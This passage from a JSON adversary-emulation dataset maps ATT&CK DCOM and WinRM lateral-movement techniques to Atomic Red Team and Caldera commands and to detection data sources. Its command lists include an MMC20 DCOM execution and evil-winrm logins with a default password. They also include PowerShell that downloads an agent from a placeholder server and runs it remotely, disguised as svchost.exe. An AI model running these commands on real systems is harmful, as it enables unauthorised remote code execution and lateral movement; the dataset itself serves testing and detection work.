by accounts (Local, Domain, or Cloud), interactively or over the network, in order to interact with network resources, applications, or services.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Google Workspace" + ], + "data_component": "logon session creation", + "description": "A logon session for a user was created.", + "source_data_element": "user", + "relationship": "created logon session from", + "target_data_element": "port" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "user", + "relationship": "accessed", + "target_data_element": "network share" + }, + { + "data_source": "network share", + "definition": "Information associated with computer resources made available from one host to other hosts on a computer network using protocols such as Server Message Protocol (SMB) and Network File System (NFS).", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "network share access", + "description": "A network share was opened or accessed.", + "source_data_element": "process", + "relationship": "accessed", + "target_data_element": "network share" + } + ], + "external_reference": [ + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ], + null, + [ + 
"https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/basic-audit-logon-events" + ], + [ + "https://docs.microsoft.com/en-us/windows-server/storage/nfs/nfs-overview", + "https://docs.microsoft.com/en-us/windows-server/storage/file-server/file-server-smb-overview" + ] + ] + }, + { + "technique_id": "T1021.003", + "command_list": [ + "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n" + ], + "commands": [ + { + "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"localhost\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "source": "atomics/T1021.003/T1021.003.yaml", + "name": "Atomic Red Team Test - Remote Services: Distributed Component Object Model" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.003", + "display_name": "Remote Services: Distributed Component Object Model", + "atomic_tests": [ + { + "name": "PowerShell Lateral Movement using MMC20", + "auto_generated_guid": "6dc74eb1-c9d6-4c53-b3b5-6f50ae339673", + "description": "Powershell lateral movement using the mmc20 application com object.\n\nReference:\n\nhttps://blog.cobaltstrike.com/2017/01/24/scripting-matt-nelsons-mmc20-application-lateral-movement-technique/\n\nUpon successful execution, cmd will spawn calc.exe on a remote computer.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "computer_name": { + "description": "Name of Computer", + "type": "String", + "default": "localhost" + } + }, + "executor": { + "command": "[activator]::CreateInstance([type]::GetTypeFromProgID(\"MMC20.application\",\"#{computer_name}\")).Document.ActiveView.ExecuteShellCommand(\"c:\\windows\\system32\\calc.exe\", $null, $null, \"7\")\n", + "name": "powershell" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + 
{ + "data_source": "module", + "definition": "Information about module files consisting of one or more classes and interfaces, such as portable executable (PE) format executables/dynamic link libraries (DLL), executable and linkable format (ELF) executables/shared libraries, and Mach-O format executables/shared libraries.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "module load", + "description": "A module was loaded into a process.", + "source_data_element": "process", + "relationship": "loaded", + "target_data_element": "module" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "network traffic", + 
"definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted connection from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected to", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "user", + "relationship": "connected from", + "target_data_element": "host" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "bound to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "permitted listener on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "attempted to listen on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "process", + "relationship": "listened on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked port bind on", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection from", + "target_data_element": "process" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked connection to", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "ip" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "port" + }, + { + "data_source": "network traffic", + "definition": "Network traffic, either summarized (e.g., as netflow) or captured in some format (e.g., as PCAP). 
This may be captured at the endpoint or network level.", + "collection_layers": [ + "host", + "network", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS" + ], + "data_component": "network connection creation", + "description": "Information about the creation of a network connection, either captured on the wire or on an endpoint.", + "source_data_element": "host", + "relationship": "blocked listener on", + "target_data_element": "process" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya", + "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module?view=netcore-3.1", + "https://docs.microsoft.com/en-us/windows/win32/debug/pe-format", + "https://elinux.org/Executable_and_Linkable_Format_(ELF)" + ], + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + null + ] + }, + { + "technique_id": "T1021.006", + "command_list": [ + "Enable-PSRemoting -Force\n", + "invoke-command -ComputerName localhost -scriptblock {#{remote_command}}\n", + "invoke-command -ComputerName #{host_name} -scriptblock {ipconfig}\n", + "evil-winrm -i #{destination_address} -u Domain\\Administrator -p #{password}", + "evil-winrm -i Target -u #{user_name} -p #{password}", + "evil-winrm -i #{destination_address} -u #{user_name} -p P@ssw0rd1", + "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock 
{Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n" + ], + "commands": [ + { + "command": "Enable-PSRemoting -Force\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "invoke-command -ComputerName localhost -scriptblock {#{remote_command}}\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "invoke-command -ComputerName #{host_name} -scriptblock {ipconfig}\n", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i #{destination_address} -u Domain\\Administrator -p #{password}", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i Target -u #{user_name} -p #{password}", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "evil-winrm -i #{destination_address} -u 
#{user_name} -p P@ssw0rd1", + "source": "atomics/T1021.006/T1021.006.yaml", + "name": "Atomic Red Team Test - Remote Services: Windows Remote Management" + }, + { + "command": "$server=\"#{server}\";\n$sharePath=\"#{share}\";\nSet-Location $sharePath;$url=\"$($server)/file/download\";\n$wc=New-Object System.Net.WebClient;$wc.Headers.add(\"platform\",\"windows\");\n$wc.Headers.add(\"file\",\"sandcat.go\");($data=$wc.DownloadData($url)) -and\n($name=$wc.ResponseHeaders[\"Content-Disposition\"].Substring($wc.ResponseHeaders[\"Content-Disposition\"].IndexOf(\"filename=\")+9).Replace(\"`\"\",\"\"))\n-and ([io.file]::WriteAllBytes(\"$($sharePath)$name.exe\",$data));\n$startServer=\"$($sharePath)$name.exe -server $($server) \";Invoke-Command\n-ScriptBlock {Param([string]$startServer, $sharePath, $name, $server) Invoke-WmiMethod\n-Class Win32_Process -Name Create -ArgumentList \"$($sharePath)$name.exe\n-server $server -v\" } -ComputerName #{remote.host.name} -ArgumentList $startServer, $sharePath, $name, $server\n", + "source": "data/abilities/lateral-movement/3734aa1e-c536-42b3-8912-4c91b8bdce90.yml", + "name": "Copy Sandcat file using PowerShell" + }, + { + "command": "$username = \"#{domain.user.name}\";\n$password = \"#{domain.user.password}\";\n$secstr = New-Object -TypeName System.Security.SecureString;\n$password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)};\n$cred = New-Object -Typename System.Management.Automation.PSCredential -Argumentlist $username, $secstr;\n$session = New-PSSession -ComputerName #{remote.host.name} -Credential $cred;\nInvoke-Command -Session $session -ScriptBlock{start-job -scriptblock{cmd.exe /c start C:\\Users\\Public\\svchost.exe -server #{server} }};\nStart-Sleep -s 5;\nRemove-PSSession -Session $session;\n", + "source": "data/abilities/lateral-movement/41bb2b7a-75af-49fd-bd15-6c827df25921.yml", + "name": "Start Agent using WinRM (WinRM)" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1021.006", + "display_name": 
"Remote Services: Windows Remote Management", + "atomic_tests": [ + { + "name": "Enable Windows Remote Management", + "auto_generated_guid": "9059e8de-3d7d-4954-a322-46161880b9cf", + "description": "Powershell Enable WinRM\n\nUpon successful execution, powershell will \"Enable-PSRemoting\" allowing for remote PS access.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "Enable-PSRemoting -Force\n", + "name": "powershell", + "elevation_required": true + } + }, + { + "name": "Invoke-Command", + "auto_generated_guid": "5295bd61-bd7e-4744-9d52-85962a4cf2d6", + "description": "Execute Invoke-command on remote host.\n\nUpon successful execution, powershell will execute ipconfig on localhost using `invoke-command`.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "host_name": { + "description": "Remote Windows Host Name", + "type": "String", + "default": "localhost" + }, + "remote_command": { + "description": "Command to execute on remote Host", + "type": "String", + "default": "ipconfig" + } + }, + "executor": { + "command": "invoke-command -ComputerName #{host_name} -scriptblock {#{remote_command}}\n", + "name": "powershell" + } + }, + { + "name": "WinRM Access with Evil-WinRM", + "auto_generated_guid": "efe86d95-44c4-4509-ae42-7bfd9d1f5b3d", + "description": "An adversary may attempt to use Evil-WinRM with a valid account to interact with remote systems that have WinRM enabled", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_name": { + "description": "Username", + "type": "String", + "default": "Domain\\Administrator" + }, + "destination_address": { + "description": "Remote Host IP or Hostname", + "type": "String", + "default": "Target" + }, + "password": { + "description": "Password", + "type": "String", + "default": "P@ssw0rd1" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Computer must have Ruby Installed", + "prereq_command": "try {if 
